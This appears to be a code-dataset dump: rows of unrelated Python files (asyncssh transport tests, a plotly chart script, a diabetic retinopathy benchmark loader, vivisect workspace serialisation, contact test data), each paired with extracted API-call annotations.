code
stringlengths 22
1.05M
| apis
listlengths 1
3.31k
| extract_api
stringlengths 75
3.25M
|
---|---|---|
import asyncio
from io import BytesIO
import pytest
from asyncssh.connection import SSHClientConnection
from asyncssh.stream import SSHReader
from scrapli.exceptions import ScrapliConnectionNotOpened, ScrapliTimeout
class DumbContainer:
def __init__(self):
self.preferred_auth = ()
def __getattr__(self, item):
# options has a billion attributes, just return None, doesnt matter for this test
return None
def test_close(monkeypatch, asyncssh_transport):
def _close(cls):
pass
monkeypatch.setattr(
"asyncssh.connection.SSHClientConnection.close",
_close,
)
# lie and pretend the session is already assigned
options = DumbContainer()
asyncssh_transport.session = SSHClientConnection(
loop=asyncio.get_event_loop_policy().get_event_loop(), options=options
)
asyncssh_transport.close()
assert asyncssh_transport.session is None
assert asyncssh_transport.stdin is None
assert asyncssh_transport.stdout is None
def test_close_catch_brokenpipe(monkeypatch, asyncssh_transport):
def _close(cls):
raise BrokenPipeError
monkeypatch.setattr(
"asyncssh.connection.SSHClientConnection.close",
_close,
)
# lie and pretend the session is already assigned
options = DumbContainer()
asyncssh_transport.session = SSHClientConnection(
loop=asyncio.get_event_loop_policy().get_event_loop(), options=options
)
asyncssh_transport.close()
assert asyncssh_transport.session is None
assert asyncssh_transport.stdin is None
assert asyncssh_transport.stdout is None
def test_isalive_no_session(asyncssh_transport):
assert asyncssh_transport.isalive() is False
def test_isalive(asyncssh_transport):
# lie and pretend the session is already assigned
options = DumbContainer()
asyncssh_transport.session = SSHClientConnection(
loop=asyncio.get_event_loop_policy().get_event_loop(), options=options
)
# lie and tell asyncssh auth is done
asyncssh_transport.session._auth_complete = True
# also have to lie and create a transport and have it return False when is_closing is called
asyncssh_transport.session._transport = DumbContainer()
asyncssh_transport.session._transport.is_closing = lambda: False
assert asyncssh_transport.isalive() is True
def test_isalive_attribute_error(asyncssh_transport):
# lie and pretend the session is already assigned
options = DumbContainer()
asyncssh_transport.session = SSHClientConnection(
loop=asyncio.get_event_loop_policy().get_event_loop(), options=options
)
# lie and tell asyncssh auth is done
asyncssh_transport.session._auth_complete = True
assert asyncssh_transport.isalive() is False
async def test_read(monkeypatch, asyncssh_transport):
async def _read(cls, _):
return b"somebytes"
monkeypatch.setattr(
"asyncssh.stream.SSHReader.read",
_read,
)
# lie and pretend the session is already assigned/stdout is already a thing
asyncssh_transport.stdout = SSHReader("", "")
assert await asyncssh_transport.read() == b"somebytes"
async def test_read_exception_not_open(asyncssh_transport):
with pytest.raises(ScrapliConnectionNotOpened):
await asyncssh_transport.read()
async def test_read_exception_timeout(monkeypatch, asyncssh_transport):
async def _read(cls, _):
await asyncio.sleep(0.5)
monkeypatch.setattr(
"asyncssh.stream.SSHReader.read",
_read,
)
# lie and pretend the session is already assigned/stdout is already a thing
asyncssh_transport.stdout = SSHReader("", "")
asyncssh_transport._base_transport_args.timeout_transport = 0.1
with pytest.raises(ScrapliTimeout):
await asyncssh_transport.read()
def test_write(asyncssh_transport):
asyncssh_transport.stdin = BytesIO()
asyncssh_transport.write(b"blah")
asyncssh_transport.stdin.seek(0)
assert asyncssh_transport.stdin.read() == b"blah"
def test_write_exception(asyncssh_transport):
with pytest.raises(ScrapliConnectionNotOpened):
asyncssh_transport.write("blah")
| [
"asyncssh.stream.SSHReader",
"io.BytesIO",
"pytest.raises",
"asyncio.sleep",
"asyncio.get_event_loop_policy"
]
| [((3113, 3130), 'asyncssh.stream.SSHReader', 'SSHReader', (['""""""', '""""""'], {}), "('', '')\n", (3122, 3130), False, 'from asyncssh.stream import SSHReader\n'), ((3683, 3700), 'asyncssh.stream.SSHReader', 'SSHReader', (['""""""', '""""""'], {}), "('', '')\n", (3692, 3700), False, 'from asyncssh.stream import SSHReader\n'), ((3919, 3928), 'io.BytesIO', 'BytesIO', ([], {}), '()\n', (3926, 3928), False, 'from io import BytesIO\n'), ((3262, 3303), 'pytest.raises', 'pytest.raises', (['ScrapliConnectionNotOpened'], {}), '(ScrapliConnectionNotOpened)\n', (3275, 3303), False, 'import pytest\n'), ((3779, 3808), 'pytest.raises', 'pytest.raises', (['ScrapliTimeout'], {}), '(ScrapliTimeout)\n', (3792, 3808), False, 'import pytest\n'), ((4115, 4156), 'pytest.raises', 'pytest.raises', (['ScrapliConnectionNotOpened'], {}), '(ScrapliConnectionNotOpened)\n', (4128, 4156), False, 'import pytest\n'), ((3462, 3480), 'asyncio.sleep', 'asyncio.sleep', (['(0.5)'], {}), '(0.5)\n', (3475, 3480), False, 'import asyncio\n'), ((784, 815), 'asyncio.get_event_loop_policy', 'asyncio.get_event_loop_policy', ([], {}), '()\n', (813, 815), False, 'import asyncio\n'), ((1400, 1431), 'asyncio.get_event_loop_policy', 'asyncio.get_event_loop_policy', ([], {}), '()\n', (1429, 1431), False, 'import asyncio\n'), ((1931, 1962), 'asyncio.get_event_loop_policy', 'asyncio.get_event_loop_policy', ([], {}), '()\n', (1960, 1962), False, 'import asyncio\n'), ((2581, 2612), 'asyncio.get_event_loop_policy', 'asyncio.get_event_loop_policy', ([], {}), '()\n', (2610, 2612), False, 'import asyncio\n')] |
from plotly.subplots import make_subplots
import plotly.graph_objects as go
import plotly.io as pio
from dataProcessor import parseLabels, parseLangs
import plotly.io as pio
import os
years = parseLabels()
langs = parseLangs()
#make the plotly results
fig = make_subplots(
rows=1, cols=2,
specs=[[{"type": "xy"}, {"type": "domain"}]],
)
fig.add_trace(go.Bar(y = list(langs.values()), x = list(langs.keys()), showlegend=False),
row=1, col=1)
fig.add_trace(go.Pie(values = list(years.values()), labels = list(years.keys())),
row=1, col=2)
fig.update_layout(height=600)
pio.write_html(fig, 'index.html', auto_open=True)
| [
"plotly.io.write_html",
"dataProcessor.parseLangs",
"plotly.subplots.make_subplots",
"dataProcessor.parseLabels"
]
| [((194, 207), 'dataProcessor.parseLabels', 'parseLabels', ([], {}), '()\n', (205, 207), False, 'from dataProcessor import parseLabels, parseLangs\n'), ((216, 228), 'dataProcessor.parseLangs', 'parseLangs', ([], {}), '()\n', (226, 228), False, 'from dataProcessor import parseLabels, parseLangs\n'), ((262, 337), 'plotly.subplots.make_subplots', 'make_subplots', ([], {'rows': '(1)', 'cols': '(2)', 'specs': "[[{'type': 'xy'}, {'type': 'domain'}]]"}), "(rows=1, cols=2, specs=[[{'type': 'xy'}, {'type': 'domain'}]])\n", (275, 337), False, 'from plotly.subplots import make_subplots\n'), ((613, 662), 'plotly.io.write_html', 'pio.write_html', (['fig', '"""index.html"""'], {'auto_open': '(True)'}), "(fig, 'index.html', auto_open=True)\n", (627, 662), True, 'import plotly.io as pio\n')] |
# Copyright 2019 BDL Benchmarks Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Diabetic retinopathy diagnosis BDL Benchmark."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
from typing import Callable
from typing import Dict
from typing import Optional
from typing import Sequence
from typing import Text
from typing import Tuple
from typing import Union
import numpy as np
import pandas as pd
import tensorflow as tf
from absl import logging
from ..core import transforms
from ..core.benchmark import Benchmark
from ..core.benchmark import BenchmarkInfo
from ..core.benchmark import DataSplits
from ..core.constants import DATA_DIR
from ..core.levels import Level
tfk = tf.keras
_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR = os.path.join(
DATA_DIR, "downloads", "manual", "diabetic_retinopathy_diagnosis")
class DiabeticRetinopathyDiagnosisBecnhmark(Benchmark):
"""Diabetic retinopathy diagnosis benchmark class."""
def __init__(
self,
level: Union[Text, Level],
batch_size: int = 64,
data_dir: Optional[Text] = None,
download_and_prepare: bool = False,
):
"""Constructs a benchmark object.
Args:
level: `Level` or `str, downstream task level.
batch_size: (optional) `int`, number of datapoints
per mini-batch.
data_dir: (optional) `str`, path to parent data directory.
download_and_prepare: (optional) `bool`, if the data is not available
it downloads and preprocesses it.
"""
self.__level = level if isinstance(level, Level) else Level.from_str(level)
try:
self.__ds = self.load(level=level,
batch_size=batch_size,
data_dir=data_dir or DATA_DIR)
except AssertionError:
if not download_and_prepare:
raise
else:
logging.info(
"Data not found, `DiabeticRetinopathyDiagnosisBecnhmark.download_and_prepare()`"
" is now running...")
self.download_and_prepare()
@classmethod
def evaluate(
cls,
estimator: Callable[[np.ndarray], Tuple[np.ndarray, np.ndarray]],
dataset: tf.data.Dataset,
output_dir: Optional[Text] = None,
name: Optional[Text] = None,
) -> Dict[Text, float]:
"""Evaluates an `estimator` on the `mode` benchmark dataset.
Args:
estimator: `lambda x: mu_x, uncertainty_x`, an uncertainty estimation
function, which returns `mean_x` and predictive `uncertainty_x`.
dataset: `tf.data.Dataset`, on which dataset to performance evaluation.
output_dir: (optional) `str`, directory to save figures.
name: (optional) `str`, the name of the method.
"""
import inspect
import tqdm
import tensorflow_datasets as tfds
from sklearn.metrics import roc_auc_score
from sklearn.metrics import accuracy_score
import matplotlib.pyplot as plt
# Containers used for caching performance evaluation
y_true = list()
y_pred = list()
y_uncertainty = list()
# Convert to NumPy iterator if necessary
ds = dataset if inspect.isgenerator(dataset) else tfds.as_numpy(dataset)
for x, y in tqdm.tqdm(ds):
# Sample from probabilistic model
mean, uncertainty = estimator(x)
# Cache predictions
y_true.append(y)
y_pred.append(mean)
y_uncertainty.append(uncertainty)
# Use vectorized NumPy containers
y_true = np.concatenate(y_true).flatten()
y_pred = np.concatenate(y_pred).flatten()
y_uncertainty = np.concatenate(y_uncertainty).flatten()
fractions = np.asarray([0.5, 0.6, 0.7, 0.8, 0.9, 1.0])
# Metrics for evaluation
metrics = zip(["accuracy", "auc"], cls.metrics())
return {
metric: cls._evaluate_metric(
y_true,
y_pred,
y_uncertainty,
fractions,
lambda y_true, y_pred: metric_fn(y_true, y_pred).numpy(),
name,
) for (metric, metric_fn) in metrics
}
@staticmethod
def _evaluate_metric(
y_true: np.ndarray,
y_pred: np.ndarray,
y_uncertainty: np.ndarray,
fractions: Sequence[float],
metric_fn: Callable[[np.ndarray, np.ndarray], float],
name=None,
) -> pd.DataFrame:
"""Evaluate model predictive distribution on `metric_fn` at data retain
`fractions`.
Args:
y_true: `numpy.ndarray`, the ground truth labels, with shape [N].
y_pred: `numpy.ndarray`, the model predictions, with shape [N].
y_uncertainty: `numpy.ndarray`, the model uncertainties,
with shape [N].
fractions: `iterable`, the percentages of data to retain for
calculating `metric_fn`.
metric_fn: `lambda(y_true, y_pred) -> float`, a metric
function that provides a score given ground truths
and predictions.
name: (optional) `str`, the name of the method.
Returns:
A `pandas.DataFrame` with columns ["retained_data", "mean", "std"],
that summarizes the scores at different data retained fractions.
"""
N = y_true.shape[0]
# Sorts indexes by ascending uncertainty
I_uncertainties = np.argsort(y_uncertainty)
# Score containers
mean = np.empty_like(fractions)
# TODO(filangel): do bootstrap sampling and estimate standard error
std = np.zeros_like(fractions)
for i, frac in enumerate(fractions):
# Keep only the %-frac of lowest uncertainties
I = np.zeros(N, dtype=bool)
I[I_uncertainties[:int(N * frac)]] = True
mean[i] = metric_fn(y_true[I], y_pred[I])
# Store
df = pd.DataFrame(dict(retained_data=fractions, mean=mean, std=std))
df.name = name
return df
@property
def datasets(self) -> tf.data.Dataset:
"""Pointer to the processed datasets."""
return self.__ds
@property
def info(self) -> BenchmarkInfo:
"""Text description of the benchmark."""
return BenchmarkInfo(description="", urls="", setup="", citation="")
@property
def level(self) -> Level:
"""The downstream task level."""
return self.__level
@staticmethod
def loss() -> tfk.losses.Loss:
"""Loss used for training binary classifiers."""
return tfk.losses.BinaryCrossentropy()
@staticmethod
def metrics() -> tfk.metrics.Metric:
"""Evaluation metrics used for monitoring training."""
return [tfk.metrics.BinaryAccuracy(), tfk.metrics.AUC()]
@staticmethod
def class_weight() -> Sequence[float]:
"""Class weights used for rebalancing the dataset, by skewing the `loss`
accordingly."""
return [1.0, 4.0]
@classmethod
def load(
cls,
level: Union[Text, Level] = "realworld",
batch_size: int = 64,
data_dir: Optional[Text] = None,
as_numpy: bool = False,
) -> DataSplits:
"""Loads the datasets for the benchmark.
Args:
level: `Level` or `str, downstream task level.
batch_size: (optional) `int`, number of datapoints
per mini-batch.
data_dir: (optional) `str`, path to parent data directory.
as_numpy: (optional) `bool`, if True returns python generators
with `numpy.ndarray` outputs.
Returns:
A namedtuple with properties:
* train: `tf.data.Dataset`, train dataset.
* validation: `tf.data.Dataset`, validation dataset.
* test: `tf.data.Dataset`, test dataset.
"""
import tensorflow_datasets as tfds
from .tfds_adapter import DiabeticRetinopathyDiagnosis
# Fetch datasets
try:
ds_train, ds_validation, ds_test = DiabeticRetinopathyDiagnosis(
data_dir=data_dir or DATA_DIR,
config=level).as_dataset(split=["train", "validation", "test"],
shuffle_files=True,
batch_size=batch_size)
except AssertionError as ae:
raise AssertionError(
str(ae) +
" Run DiabeticRetinopathyDiagnosisBecnhmark.download_and_prepare()"
" first and then retry.")
# Parse task level
level = level if isinstance(level, Level) else Level.from_str(level)
# Dataset tranformations
transforms_train, transforms_eval = cls._preprocessors()
# Apply transformations
ds_train = ds_train.map(transforms_train,
num_parallel_calls=tf.data.experimental.AUTOTUNE)
ds_validation = ds_validation.map(
transforms_eval, num_parallel_calls=tf.data.experimental.AUTOTUNE)
ds_test = ds_test.map(transforms_eval,
num_parallel_calls=tf.data.experimental.AUTOTUNE)
# Prefetches datasets to memory
ds_train = ds_train.prefetch(tf.data.experimental.AUTOTUNE)
ds_validation = ds_validation.prefetch(tf.data.experimental.AUTOTUNE)
ds_test = ds_test.prefetch(tf.data.experimental.AUTOTUNE)
if as_numpy:
# Convert to NumPy iterators
ds_train = tfds.as_numpy(ds_train)
ds_validation = tfds.as_numpy(ds_validation)
ds_test = tfds.as_numpy(ds_test)
return DataSplits(ds_train, ds_validation, ds_test)
@classmethod
def download_and_prepare(cls, levels=None) -> None:
"""Downloads dataset from Kaggle, extracts zip files and processes it using
`tensorflow_datasets`.
Args:
levels: (optional) `iterable` of `str`, specifies which
levels from {'medium', 'realworld'} to prepare,
if None it prepares all the levels.
Raises:
OSError: if `~/.kaggle/kaggle.json` is not set up.
"""
# Disable GPU for data download, extraction and preparation
import os
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
cls._download()
# cls._extract()
#cls._prepare(levels)
@staticmethod
def _download() -> None:
"""Downloads data from Kaggle using `tensorflow_datasets`.
Raises:
OSError: if `~/.kaggle/kaggle.json` is not set up.
"""
import subprocess as sp
import tensorflow_datasets as tfds
# Append `/home/$USER/.local/bin` to path
os.environ["PATH"] += ":/home/{}/.local/bin/".format(os.environ["USER"])
# Download all files from Kaggle
drd = tfds.download.kaggle.KaggleCompetitionDownloader(
"diabetic-retinopathy-detection")
try:
for dfile in drd.competition_files:
drd.download_file(dfile,
output_dir=_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR)
except sp.CalledProcessError as cpe:
raise OSError(
str(cpe) + "." +
" Make sure you have ~/.kaggle/kaggle.json setup, fetched from the Kaggle website"
" https://www.kaggle.com/<username>/account -> 'Create New API Key'."
" Also accept the dataset license by going to"
" https://www.kaggle.com/c/diabetic-retinopathy-detection/rules"
" and look for the button 'I Understand and Accept' (make sure when reloading the"
" page that the button does not pop up again).")
@staticmethod
def _extract() -> None:
"""Extracts zip files downloaded from Kaggle."""
import glob
import tqdm
import zipfile
import tempfile
# Extract train and test original images
for split in ["train", "test"]:
# Extract "<split>.zip.00*"" files to "<split>"
with tempfile.NamedTemporaryFile() as tmp:
# Concatenate "<split>.zip.00*" to "<split>.zip"
for fname in tqdm.tqdm(
sorted(
glob.glob(
os.path.join(_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR,
"{split}.zip.00*".format(split=split))))):
# Unzip "<split>.zip" to "<split>"
with open(fname, "rb") as ztmp:
tmp.write(ztmp.read())
with zipfile.ZipFile(tmp) as zfile:
for image in tqdm.tqdm(iterable=zfile.namelist(),
total=len(zfile.namelist())):
zfile.extract(member=image,
path=_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR)
# Delete "<split>.zip.00*" files
for splitzip in os.listdir(_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR):
if "{split}.zip.00".format(split=split) in splitzip:
os.remove(
os.path.join(_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR, splitzip))
# Extract "sample.zip", "trainLabels.csv.zip"
for fname in ["sample", "trainLabels.csv"]:
zfname = os.path.join(_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR,
"{fname}.zip".format(fname=fname))
with zipfile.ZipFile(zfname) as zfile:
zfile.extractall(_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR)
os.remove(zfname)
@staticmethod
def _prepare(levels=None) -> None:
"""Generates the TFRecord objects for medium and realworld experiments."""
import multiprocessing
from absl import logging
from .tfds_adapter import DiabeticRetinopathyDiagnosis
# Hangle each level individually
for level in levels or ["medium", "realworld"]:
dtask = DiabeticRetinopathyDiagnosis(data_dir=DATA_DIR, config=level)
logging.debug("=== Preparing TFRecords for {} ===".format(level))
dtask.download_and_prepare()
@classmethod
def _preprocessors(cls) -> Tuple[transforms.Transform, transforms.Transform]:
"""Applies transformations to the raw data."""
import tensorflow_datasets as tfds
# Transformation hyperparameters
mean = np.asarray([0.42606387, 0.29752496, 0.21309826])
stddev = np.asarray([0.27662534, 0.20280295, 0.1687619])
class Parse(transforms.Transform):
"""Parses datapoints from raw `tf.data.Dataset`."""
def __call__(self, x, y=None):
"""Returns `as_supervised` tuple."""
return x["image"], x["label"]
class CastX(transforms.Transform):
"""Casts image to `dtype`."""
def __init__(self, dtype):
"""Constructs a type caster."""
self.dtype = dtype
def __call__(self, x, y):
"""Returns casted image (to `dtype`) and its (unchanged) label as
tuple."""
return tf.cast(x, self.dtype), y
class To01X(transforms.Transform):
"""Rescales image to [min, max]=[0, 1]."""
def __call__(self, x, y):
"""Returns rescaled image and its (unchanged) label as tuple."""
return x / 255.0, y
# Get augmentation schemes
[augmentation_config,
no_augmentation_config] = cls._ImageDataGenerator_config()
# Transformations for train dataset
transforms_train = transforms.Compose([
Parse(),
CastX(tf.float32),
To01X(),
transforms.Normalize(mean, stddev),
# TODO(filangel): hangle batch with ImageDataGenerator
# transforms.RandomAugment(**augmentation_config),
])
# Transformations for validation/test dataset
transforms_eval = transforms.Compose([
Parse(),
CastX(tf.float32),
To01X(),
transforms.Normalize(mean, stddev),
# TODO(filangel): hangle batch with ImageDataGenerator
# transforms.RandomAugment(**no_augmentation_config),
])
return transforms_train, transforms_eval
@staticmethod
def _ImageDataGenerator_config():
"""Returns the configs for the
`tensorflow.keras.preprocessing.image.ImageDataGenerator`, used for the
random augmentation of the dataset, following the implementation of
https://github.com/chleibig/disease-detection/blob/f3401b26aa9b832ff77afe93
e3faa342f7d088e5/scripts/inspect_data_augmentation.py."""
augmentation_config = dict(
featurewise_center=False,
samplewise_center=False,
featurewise_std_normalization=False,
samplewise_std_normalization=False,
zca_whitening=False,
rotation_range=180.0,
width_shift_range=0.05,
height_shift_range=0.05,
shear_range=0.,
zoom_range=0.10,
channel_shift_range=0.,
fill_mode="constant",
cval=0.,
horizontal_flip=True,
vertical_flip=True,
data_format="channels_last",
)
no_augmentation_config = dict(
featurewise_center=False,
samplewise_center=False,
featurewise_std_normalization=False,
samplewise_std_normalization=False,
zca_whitening=False,
rotation_range=0.0,
width_shift_range=0.0,
height_shift_range=0.0,
shear_range=0.,
zoom_range=0.0,
channel_shift_range=0.,
fill_mode="nearest",
cval=0.,
horizontal_flip=False,
vertical_flip=False,
data_format="channels_last",
)
return augmentation_config, no_augmentation_config
| [
"tensorflow_datasets.as_numpy",
"os.listdir",
"zipfile.ZipFile",
"tqdm.tqdm",
"numpy.asarray",
"os.path.join",
"inspect.isgenerator",
"absl.logging.info",
"numpy.argsort",
"numpy.zeros",
"numpy.empty_like",
"numpy.concatenate",
"tempfile.NamedTemporaryFile",
"tensorflow_datasets.download.kaggle.KaggleCompetitionDownloader",
"tensorflow.cast",
"numpy.zeros_like",
"os.remove"
]
| [((1435, 1514), 'os.path.join', 'os.path.join', (['DATA_DIR', '"""downloads"""', '"""manual"""', '"""diabetic_retinopathy_diagnosis"""'], {}), "(DATA_DIR, 'downloads', 'manual', 'diabetic_retinopathy_diagnosis')\n", (1447, 1514), False, 'import os\n'), ((3842, 3855), 'tqdm.tqdm', 'tqdm.tqdm', (['ds'], {}), '(ds)\n', (3851, 3855), False, 'import tqdm\n'), ((4258, 4300), 'numpy.asarray', 'np.asarray', (['[0.5, 0.6, 0.7, 0.8, 0.9, 1.0]'], {}), '([0.5, 0.6, 0.7, 0.8, 0.9, 1.0])\n', (4268, 4300), True, 'import numpy as np\n'), ((5816, 5841), 'numpy.argsort', 'np.argsort', (['y_uncertainty'], {}), '(y_uncertainty)\n', (5826, 5841), True, 'import numpy as np\n'), ((5877, 5901), 'numpy.empty_like', 'np.empty_like', (['fractions'], {}), '(fractions)\n', (5890, 5901), True, 'import numpy as np\n'), ((5984, 6008), 'numpy.zeros_like', 'np.zeros_like', (['fractions'], {}), '(fractions)\n', (5997, 6008), True, 'import numpy as np\n'), ((10740, 10827), 'tensorflow_datasets.download.kaggle.KaggleCompetitionDownloader', 'tfds.download.kaggle.KaggleCompetitionDownloader', (['"""diabetic-retinopathy-detection"""'], {}), "(\n 'diabetic-retinopathy-detection')\n", (10788, 10827), True, 'import tensorflow_datasets as tfds\n'), ((13982, 14030), 'numpy.asarray', 'np.asarray', (['[0.42606387, 0.29752496, 0.21309826]'], {}), '([0.42606387, 0.29752496, 0.21309826])\n', (13992, 14030), True, 'import numpy as np\n'), ((14044, 14091), 'numpy.asarray', 'np.asarray', (['[0.27662534, 0.20280295, 0.1687619]'], {}), '([0.27662534, 0.20280295, 0.1687619])\n', (14054, 14091), True, 'import numpy as np\n'), ((3768, 3796), 'inspect.isgenerator', 'inspect.isgenerator', (['dataset'], {}), '(dataset)\n', (3787, 3796), False, 'import inspect\n'), ((3802, 3824), 'tensorflow_datasets.as_numpy', 'tfds.as_numpy', (['dataset'], {}), '(dataset)\n', (3815, 3824), True, 'import tensorflow_datasets as tfds\n'), ((6114, 6137), 'numpy.zeros', 'np.zeros', (['N'], {'dtype': 'bool'}), '(N, dtype=bool)\n', (6122, 6137), True, 'import numpy as np\n'), ((9526, 9549), 'tensorflow_datasets.as_numpy', 'tfds.as_numpy', (['ds_train'], {}), '(ds_train)\n', (9539, 9549), True, 'import tensorflow_datasets as tfds\n'), ((9572, 9600), 'tensorflow_datasets.as_numpy', 'tfds.as_numpy', (['ds_validation'], {}), '(ds_validation)\n', (9585, 9600), True, 'import tensorflow_datasets as tfds\n'), ((9617, 9639), 'tensorflow_datasets.as_numpy', 'tfds.as_numpy', (['ds_test'], {}), '(ds_test)\n', (9630, 9639), True, 'import tensorflow_datasets as tfds\n'), ((12643, 12695), 'os.listdir', 'os.listdir', (['_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR'], {}), '(_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR)\n', (12653, 12695), False, 'import os\n'), ((13209, 13226), 'os.remove', 'os.remove', (['zfname'], {}), '(zfname)\n', (13218, 13226), False, 'import os\n'), ((4103, 4125), 'numpy.concatenate', 'np.concatenate', (['y_true'], {}), '(y_true)\n', (4117, 4125), True, 'import numpy as np\n'), ((4149, 4171), 'numpy.concatenate', 'np.concatenate', (['y_pred'], {}), '(y_pred)\n', (4163, 4171), True, 'import numpy as np\n'), ((4202, 4231), 'numpy.concatenate', 'np.concatenate', (['y_uncertainty'], {}), '(y_uncertainty)\n', (4216, 4231), True, 'import numpy as np\n'), ((11855, 11884), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', ([], {}), '()\n', (11882, 11884), False, 'import tempfile\n'), ((13102, 13125), 'zipfile.ZipFile', 'zipfile.ZipFile', (['zfname'], {}), '(zfname)\n', (13117, 13125), False, 'import zipfile\n'), ((2520, 2642), 'absl.logging.info', 'logging.info', (['"""Data not found, `DiabeticRetinopathyDiagnosisBecnhmark.download_and_prepare()` is now running..."""'], {}), "(\n 'Data not found, `DiabeticRetinopathyDiagnosisBecnhmark.download_and_prepare()` is now running...'\n )\n", (2532, 2642), False, 'from absl import logging\n'), ((12315, 12335), 'zipfile.ZipFile', 'zipfile.ZipFile', (['tmp'], {}), '(tmp)\n', (12330, 12335), False, 'import zipfile\n'), ((14628, 14650), 'tensorflow.cast', 'tf.cast', (['x', 'self.dtype'], {}), '(x, self.dtype)\n', (14635, 14650), True, 'import tensorflow as tf\n'), ((12793, 12857), 'os.path.join', 'os.path.join', (['_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR', 'splitzip'], {}), '(_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR, splitzip)\n', (12805, 12857), False, 'import os\n')] |
import base64
import logging
import msgpack
logger = logging.getLogger(__name__)
loadargs = {'use_list': False, 'raw': False}
if msgpack.version < (1, 0, 0):
loadargs['encoding'] = 'utf-8'
else:
loadargs['strict_map_key'] = False
VSIG = b'MSGVIV'.ljust(8, b'\x00')
def vivEventsAppendFile(filename, events):
with open(filename, 'ab') as f:
for event in events:
if event[0] == 20:
mape = base64.b64encode(event[1][3])
event = (event[0], (event[1][0], event[1][1], event[1][2], mape))
msgpack.pack(event, f, use_bin_type=False)
def saveWorkspaceChanges(vw, filename):
events = vw.exportWorkspaceChanges()
vivEventsAppendFile(filename, events)
def vivEventsToFile(filename, events):
with open(filename, 'wb') as f:
msgpack.pack(VSIG, f, use_bin_type=False)
for event in events:
if event[0] == 20:
mape = base64.b64encode(event[1][3])
event = (event[0], (event[1][0], event[1][1], event[1][2], mape))
msgpack.pack(event, f, use_bin_type=False)
def saveWorkspace(vw, filename):
events = vw.exportWorkspace()
vivEventsToFile(filename, events)
def vivEventsFromFile(filename):
events = []
with open(filename, 'rb') as f:
unpacker = msgpack.Unpacker(f, **loadargs)
siggy = next(unpacker)
if siggy.encode('utf-8') != VSIG:
logger.warning('Invalid file signature of %s', str(siggy))
return
for event in unpacker:
if event[0] == 20:
mape = base64.b64decode(event[1][3])
event = (event[0], (event[1][0], event[1][1], event[1][2], mape))
events.append(event)
return events
def loadWorkspace(vw, filename):
events = vivEventsFromFile(filename)
vw.importWorkspace(events)
| [
"logging.getLogger",
"msgpack.pack",
"base64.b64encode",
"base64.b64decode",
"msgpack.Unpacker"
]
| [((55, 82), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (72, 82), False, 'import logging\n'), ((818, 859), 'msgpack.pack', 'msgpack.pack', (['VSIG', 'f'], {'use_bin_type': '(False)'}), '(VSIG, f, use_bin_type=False)\n', (830, 859), False, 'import msgpack\n'), ((1323, 1354), 'msgpack.Unpacker', 'msgpack.Unpacker', (['f'], {}), '(f, **loadargs)\n', (1339, 1354), False, 'import msgpack\n'), ((565, 607), 'msgpack.pack', 'msgpack.pack', (['event', 'f'], {'use_bin_type': '(False)'}), '(event, f, use_bin_type=False)\n', (577, 607), False, 'import msgpack\n'), ((1067, 1109), 'msgpack.pack', 'msgpack.pack', (['event', 'f'], {'use_bin_type': '(False)'}), '(event, f, use_bin_type=False)\n', (1079, 1109), False, 'import msgpack\n'), ((441, 470), 'base64.b64encode', 'base64.b64encode', (['event[1][3]'], {}), '(event[1][3])\n', (457, 470), False, 'import base64\n'), ((943, 972), 'base64.b64encode', 'base64.b64encode', (['event[1][3]'], {}), '(event[1][3])\n', (959, 972), False, 'import base64\n'), ((1603, 1632), 'base64.b64decode', 'base64.b64decode', (['event[1][3]'], {}), '(event[1][3])\n', (1619, 1632), False, 'import base64\n')] |
import glob
from os import walk
exclude_folders = [
'node_modules',
'ios',
'android',
'__pycache__'
]
exclude_files = [
'json',
'txt',
'traineddata',
'lstmf',
'yml',
'md'
'log',
'env',
'gitignore',
'dockerignore'
]
# get all files in directory
dirr = '/home/viktor/Documents/personal-expenses-accounting/app/services/web_service/'
folders = glob.glob(dirr + '/**/', recursive=True)
# only app related directories
directories = []
for folder in folders:
current_folder = folder.split('/')[-2]
if current_folder not in exclude_folders:
files = glob.glob(folder + '*')
print(files)
directories.append(folder)
# num_lines = sum(1 for line in open('myfile.txt'))
| [
"glob.glob"
]
| [((400, 440), 'glob.glob', 'glob.glob', (["(dirr + '/**/')"], {'recursive': '(True)'}), "(dirr + '/**/', recursive=True)\n", (409, 440), False, 'import glob\n'), ((618, 641), 'glob.glob', 'glob.glob', (["(folder + '*')"], {}), "(folder + '*')\n", (627, 641), False, 'import glob\n')] |
from models.contact import Contact
testdata = [Contact(first_name="Firstname", last_name="Lastname", mobile_phone="+12345678",
work_phone="12345", home_phone="67890", fax="55443322", email_1="<EMAIL>",
email_2="<EMAIL>", email_3="<EMAIL>",
address="Street, 15 \n 12345 New-York")]
| [
"models.contact.Contact"
]
